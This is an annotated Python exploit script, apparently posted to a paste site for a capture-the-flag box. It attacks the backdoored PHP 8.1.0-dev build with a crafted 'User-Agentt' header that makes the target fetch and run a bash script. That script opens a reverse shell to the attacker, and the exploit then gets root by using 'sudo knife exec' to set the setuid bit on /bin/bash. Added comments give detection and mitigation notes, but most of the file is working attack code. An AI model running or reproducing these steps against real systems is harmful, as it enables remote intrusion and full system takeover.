tukutu

autopwn_knife.py

Aug 26th, 2021
  1. #!/usr/bin/python3
  2.  
  3. # Exploit Title: PHP 8.1.0-dev Backdoor Remote Code Execution
  4. # Date: 26/08/21
  5. # Exploit Author: H4ckBl0g
  6. # Version: 8.1.0-dev
  7. # CVE : N/A
  8. # References:
  9. #     - https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a
  10. #     - https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md
  11. #Uso: python3 autopwn_knife.py <LHOST> <URL>
  12. #Ejemplo: python3 autopwn_knife.py 10.10.16.198 http://10.10.10.242/
  13.  
  14. import sys
  15. import os
  16. import time
  17. import threading
  18. import requests
  19. import signal
  20. import subprocess
  21. from pwn import *
  22.  
  23.  
# Exactly two positional arguments are required: <LHOST> followed by <URL>.
if len(sys.argv[1:]) != 2:
    print("\nUso: python3 autopwn_knife.py <LHOST> <URL>\n\nEjemplo: python3 autopwn_knife.py 10.10.16.198 http://10.10.10.242/")
    sys.exit(1)


# Settings
# LHOST: address the target is told to fetch the staged script from and connect back to.
# URL:   the page the single crafted GET request is sent to.
LHOST, URL = sys.argv[1:]
# Local port the listener binds to.
LPORT = 443
  33.  
  34. #Funciones
def def_handler(sig, frame):
    """Handle SIGINT: print the exit notice and terminate with status 1.

    ``sig`` and ``frame`` are passed in by the signal machinery and are not used.
    """
    print("\n[!] Saliendo...\n")
    raise SystemExit(1)


# Route Ctrl+C (SIGINT) to the handler above.
signal.signal(signal.SIGINT, def_handler)
  41.  
  42.  
def obtainShell():
    """Stage a callback script, serve it over HTTP, and send the trigger request.

    In order, this function:
      1. writes ``index.html`` into the current directory, containing a bash
         script that opens an interactive shell back to ``LHOST`` on TCP 443;
      2. starts ``python3 -m http.server 80`` wrapped in ``timeout 10``, so the
         file is served from this machine for at most ten seconds;
      3. sends one GET to ``URL`` with an extra ``User-Agentt`` header (double
         "t") whose value starts with ``zerodium`` and carries a PHP
         ``system()`` call that fetches the file with curl and pipes it to bash.

    Defender notes:
      * The misspelled ``User-Agentt`` request header with a value beginning
        ``zerodium`` is the trigger for the backdoored PHP 8.1.0-dev build named
        in the file header. No legitimate client sends it, so it works as a
        high-confidence match in web, proxy or WAF logs.
      * On the host, the follow-on activity is the PHP/web-server process
        spawning ``curl`` piped into ``bash``, then an outbound TCP connection
        to port 443 from that process tree.
      * Blocking the header only hides the symptom. An affected interpreter
        has to be replaced with a build made from verified source, and
        restricting outbound connections from web workers limits the impact.

    Any exception raised here is printed and swallowed; nothing is returned.
    """
    try:
        # NOTE(review): p1 is never updated or closed after this line.
        p1 = log.progress("\nCreando archivo index.html con contenido malicioso\n")
        # NOTE(review): LHOST comes straight from argv and is interpolated into a
        # shell command line, so shell metacharacters in it would be executed
        # locally. The port written into the script is the literal 443, not LPORT.
        os.system('echo "#!/bin/bash\n\nbash -i >& /dev/tcp/%s/443 0>&1" > index.html' %LHOST)
        s = requests.Session()
        # Ordinary User-Agent plus the misspelled header that carries the PHP code.
        cmd_header = {
            'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
            'User-Agentt' : 'zerodiumsystem("curl http://%s|bash");' %LHOST
        }
        # Serve the current directory on port 80; `timeout 10` stops the server
        # after ten seconds.
        subprocess.Popen(["timeout", "10", "python3", "-m", "http.server", "80"])
        # Give the HTTP server a moment to bind before the request goes out.
        time.sleep(1)
        # The response is stored in r but never inspected.
        r = s.get(URL, headers=cmd_header)
        time.sleep(1)


    except Exception as e:
        # Broad catch: every failure (file write, server start, HTTP request)
        # is reduced to a printed message.
        print(e)
  60.  
  61.  
  62.  
if __name__ == '__main__':
    # Flow: run obtainShell() in a background thread, wait up to five seconds
    # for an inbound connection on LPORT, then send three commands over it and
    # hand the session to the operator.
    #
    # Defender notes on the commands sent below:
    #   * `sudo /usr/bin/knife exec -E ...` only succeeds if the compromised
    #     account is allowed to run knife through sudo without a password
    #     (presumably the case on the intended target; verify in sudoers).
    #     `knife exec` evaluates arbitrary Ruby, so a sudo rule for it is
    #     equivalent to granting root.
    #   * The Ruby snippet sets the setuid bit on /bin/bash and `bash -p` then
    #     keeps the elevated effective UID. The bit stays set after the session
    #     ends. A setuid /bin/bash is a strong indicator of compromise: compare
    #     against a baseline of setuid files and audit chmod calls on shells.
    #   * Mitigation: remove or tightly scope the sudo rule, and restore the
    #     original mode on /bin/bash after an incident.
    try:
        # This try only covers starting the thread; errors raised inside
        # obtainShell() are handled there.
        threading.Thread(target=obtainShell).start()
    except Exception as e:
        log.error(str(e))
    # pwntools listener on LPORT, waiting at most five seconds for a connection.
    shell = listen(LPORT, timeout=5).wait_for_connection()

    # The script treats a missing socket as "no connection arrived in time".
    if shell.sock is None:
        log.failure("No se ha obtenido conexion")
        sys.exit()
    else:
        log.success("\n ✔️  Se ha obtenido una shell ✔️ \n")
        # Remove the staged script from the local working directory.
        os.system("rm index.html")
        time.sleep(1)
        shell.sendline("""sudo /usr/bin/knife exec -E 'exec "chmod +s /bin/bash"'""")
        shell.sendline("bash -p")
        shell.sendline("whoami")

    # Reached only on the success path, because the failure branch exits above.
    shell.interactive()
  82.  
  83.  